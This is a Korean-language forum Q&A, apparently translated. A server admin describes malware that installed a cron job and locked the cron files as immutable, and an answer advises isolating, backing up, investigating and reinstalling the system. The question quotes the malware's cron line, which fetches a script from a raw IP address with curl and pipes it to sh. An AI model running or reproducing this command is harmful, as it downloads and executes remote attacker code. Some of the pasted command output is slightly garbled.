아래의 crontab 항목을 생성하는 악성 코드를 억제하기 위해 II에서는 cron.deny 사용을 도입합니다.
*/5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh
그러나 모든 사용자 crontab이 갑자기 모든 작업 트리거를 중단했습니다. 문제 해결 중에 모든 사용자가 모든 cron 관련 파일을 편집할 수 없다는 것을 확인했습니다.
ls -lht /etc/cron.denyus -rw----er--- 1 root root 5 May 23 11:51 /etc/cron.deny
ls -lht /var/spool/cron/root
-rw-r--r-- 1 root root 62 Jun 16 08:10 /var/spool/cron/root
chmod 775 /etc/cron.deny
chmod: changing permissions of `/etc/cron.deny': Operation not permitted
chmod 775 /var/spool/cron/root
chmod: changing permissions of `/var/spool/cron/root': Operation not permitted
나중에 나는 그것들이 모두 불변의 속성을 가지고 있다는 것을 발견했습니다.
lsattr /var/spool/cron/root
----i--------e- /var/spool/cron/root
lsattr /etc/cron.deny
----i--------e- /etc/cron.deny
다음을 사용하여 불변 속성을 변경했습니다.
chattr -i /etc/cron.deny
chattr -i /var/spool/cron/root
그러나 cron은 이러한 작업을 실행할 수 없습니다.
답변1
거기 멈춰! 귀하의 시스템이 악성코드에 감염되었습니다. 이 시점에서는 시스템이 말하는 것을 신뢰할 수 없습니다. 악성코드가 커널을 수정했을 수 있습니다. 당신이 보는 것은 악성코드가 당신에게 보여주기를 원하는 것입니다. 시스템이 일관되지 않게 동작할 수 있습니다. 예를 들어, 편집자가 파일을 성공적으로 저장했다고 해서 파일을 수정할 것이라고 기대하지 마십시오.
다시 한 번 권한, 불변 속성 등을 이해하는 것을 잊어버리세요. 이 모든 것들은 작업 시스템에만 적용됩니다. 손상된 시스템에서는 일이 일관된 방식으로 실행되지 않습니다.
지금 해야 할 일은 다음과 같습니다.
- 지금 서버를 오프라인으로 전환하세요. 사용자를 악성 코드로 감염시킬 수 있습니다.
- 백업하기. 기존 백업을 삭제하지 마십시오! 두 가지 이유로 감염된 시스템을 백업해야 합니다. 감염 소스를 추적하고 최신 데이터를 확보하기 위해서입니다.
- 어떻게 감염되었는지 알아보세요. 이는 중요합니다. 이전과 동일한 보안 침해로부터 시스템을 복구하면 시스템이 다시 감염됩니다.
- 처음부터 새로운 시스템 설치. 시스템에서 맬웨어를 안정적으로 제거할 수 없습니다. 맬웨어는 이를 어렵게 만들려고 시도하므로 이를 속일 수 있을지 확신할 수 없습니다.
모든 소프트웨어에 대해 최신 보안 업데이트를 설치하고 재감염을 방지하기 위해 안전하게 구성했는지 확인하십시오. - 데이터를 복구하세요. 복원만 확인하세요.데이터, 아니다취약한 소프트웨어.
당신은 또한 볼 수 있습니다감염된 서버를 처리하는 방법은 무엇입니까?